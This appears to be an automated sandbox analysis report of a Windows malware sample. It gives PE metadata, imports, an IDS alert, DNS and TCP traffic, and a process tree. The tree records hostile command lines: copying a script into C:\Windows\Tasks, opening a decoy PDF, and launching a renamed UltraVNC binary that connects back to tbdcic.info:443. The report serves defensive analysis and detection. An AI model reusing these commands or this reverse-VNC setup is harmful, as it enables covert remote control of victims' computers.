IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x364	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x130f0	0x13200	a86014994324ad6f47bddf386fd89176	False	0.6081495098039216	data	6.614408281478693	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x3560	0x3600	9abc217bd20b39b1db2f57ddf9bc789c	False	0.4381510416666667	data	5.5938980842785995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x29ec	0x800	4c129856aeef51c872b4a2f6db01e9bd	False	0.44580078125	data	3.8126171673069433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1c000	0x309f0	0x30a00	32c6714aa776c8352eda97e813ef0b21	False	0.7375381587403599	data	7.293326377493547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1c280	0x18de	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia	0.9696826892868363
RT_ICON	0x1db60	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia	0.08974964572508266
RT_ICON	0x21d88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia	0.12935684647302906
RT_ICON	0x24330	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720	Russian	Russia	0.16553254437869822
RT_ICON	0x25d98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia	0.21106941838649157
RT_ICON	0x26e40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Russian	Russia	0.29508196721311475
RT_ICON	0x277c8	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	Russian	Russia	0.33313953488372094
RT_ICON	0x27e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.4592198581560284
RT_GROUP_ICON	0x282e8	0x76	data	Russian	Russia	0.7457627118644068
RT_VERSION	0x28360	0x350	data			0.4693396226415094
RT_MANIFEST	0x286b0	0x33c	ASCII text, with CRLF line terminators	English	United States	0.501207729468599

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll	SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
MSVCRT.dll	??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-23T13:41:06.611036+0100	2035893	ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon	1	192.168.2.9	49930	194.190.152.201	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:39:58.296355009 CET	49771	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:39:58.296401024 CET	443	49771	194.190.152.201	192.168.2.9
Dec 23, 2024 13:39:58.296555996 CET	49771	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:39:58.296747923 CET	49771	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:39:58.296761990 CET	443	49771	194.190.152.201	192.168.2.9
Dec 23, 2024 13:39:58.296813965 CET	443	49771	194.190.152.201	192.168.2.9
Dec 23, 2024 13:39:58.408020020 CET	49772	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:39:58.408099890 CET	443	49772	194.190.152.201	192.168.2.9
Dec 23, 2024 13:39:58.408179998 CET	49772	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:39:58.408293962 CET	49772	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:39:58.408318996 CET	443	49772	194.190.152.201	192.168.2.9
Dec 23, 2024 13:39:58.408435106 CET	443	49772	194.190.152.201	192.168.2.9
Dec 23, 2024 13:40:10.267014980 CET	49799	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:40:10.267060041 CET	443	49799	194.190.152.201	192.168.2.9
Dec 23, 2024 13:40:10.267345905 CET	49799	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:40:10.267481089 CET	49799	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:40:10.267505884 CET	443	49799	194.190.152.201	192.168.2.9
Dec 23, 2024 13:40:10.267563105 CET	443	49799	194.190.152.201	192.168.2.9
Dec 23, 2024 13:40:32.631025076 CET	49850	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:40:32.631055117 CET	443	49850	194.190.152.201	192.168.2.9
Dec 23, 2024 13:40:32.631125927 CET	49850	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:40:32.631236076 CET	49850	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:40:32.631246090 CET	443	49850	194.190.152.201	192.168.2.9
Dec 23, 2024 13:40:32.631428957 CET	443	49850	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:06.608294964 CET	49930	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:06.608333111 CET	443	49930	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:06.608397961 CET	49930	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:06.608561039 CET	49930	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:06.608566999 CET	443	49930	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:06.611036062 CET	49930	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:06.611042023 CET	443	49930	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:06.611224890 CET	443	49930	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:51.239324093 CET	49996	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:51.239383936 CET	443	49996	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:51.239475965 CET	49996	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:51.242892027 CET	49996	443	192.168.2.9	194.190.152.201
Dec 23, 2024 13:41:51.242904902 CET	443	49996	194.190.152.201	192.168.2.9
Dec 23, 2024 13:41:51.242959976 CET	443	49996	194.190.152.201	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:39:51.541707993 CET	56595	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:39:58.039297104 CET	63866	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:39:58.178145885 CET	53	63866	1.1.1.1	192.168.2.9
Dec 23, 2024 13:40:18.278340101 CET	63991	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:40:18.427407026 CET	53	63991	1.1.1.1	192.168.2.9
Dec 23, 2024 13:40:42.351047039 CET	60755	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:40:42.489831924 CET	53	60755	1.1.1.1	192.168.2.9
Dec 23, 2024 13:41:06.467329025 CET	54826	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:41:06.604892015 CET	53	54826	1.1.1.1	192.168.2.9
Dec 23, 2024 13:41:30.536657095 CET	56416	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:41:30.676537037 CET	53	56416	1.1.1.1	192.168.2.9
Dec 23, 2024 13:41:54.652226925 CET	57290	53	192.168.2.9	1.1.1.1
Dec 23, 2024 13:41:54.796623945 CET	53	57290	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 13:39:51.541707993 CET	192.168.2.9	1.1.1.1	0x59f5	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:39:58.039297104 CET	192.168.2.9	1.1.1.1	0xe6d0	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:40:18.278340101 CET	192.168.2.9	1.1.1.1	0x275c	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:40:42.351047039 CET	192.168.2.9	1.1.1.1	0x7c3b	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:41:06.467329025 CET	192.168.2.9	1.1.1.1	0x486b	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:41:30.536657095 CET	192.168.2.9	1.1.1.1	0x158e	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:41:54.652226925 CET	192.168.2.9	1.1.1.1	0x7acb	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 13:39:35.543591022 CET	1.1.1.1	192.168.2.9	0x2ecd	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 13:39:35.543591022 CET	1.1.1.1	192.168.2.9	0x2ecd	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:39:51.682699919 CET	1.1.1.1	192.168.2.9	0x59f5	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 13:39:53.456017971 CET	1.1.1.1	192.168.2.9	0xd13d	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:39:53.456017971 CET	1.1.1.1	192.168.2.9	0xd13d	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:39:58.178145885 CET	1.1.1.1	192.168.2.9	0xe6d0	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:40:18.427407026 CET	1.1.1.1	192.168.2.9	0x275c	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:40:42.489831924 CET	1.1.1.1	192.168.2.9	0x7c3b	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:41:06.604892015 CET	1.1.1.1	192.168.2.9	0x486b	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:41:30.676537037 CET	1.1.1.1	192.168.2.9	0x158e	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:41:54.796623945 CET	1.1.1.1	192.168.2.9	0x7acb	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	07:39:38
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\7q551ugrWe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7q551ugrWe.exe"
Imagebase:	0x400000
File size:	1'664'495 bytes
MD5 hash:	D61940626FAD051067BFD16F2AB4E657
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:39:38
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:39:38
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:39:39
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:39:39
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:39:39
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:39:39
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:39:39
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:39:40
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Imagebase:	0x7ff6153b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:39:40
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:39:41
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff61f300000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:39:41
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im sync_browser.exe
Imagebase:	0x30000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:39:41
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff61f300000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	07:39:42
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:39:46
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:39:47
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:39:49
Start date:	23/12/2024
Path:	C:\Windows\Tasks\sync_browser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\sync_browser.exe
Imagebase:	0x7ff67e7c0000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	07:39:49
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 8
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:39:57
Start date:	23/12/2024
Path:	C:\Windows\Tasks\sync_browser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
Imagebase:	0x7ff67e7c0000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:39:57
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:39:59
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 4
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:40:03
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:40:31
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:40:45
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0x7ff6fab70000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:41:27
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:42:09
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xb40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

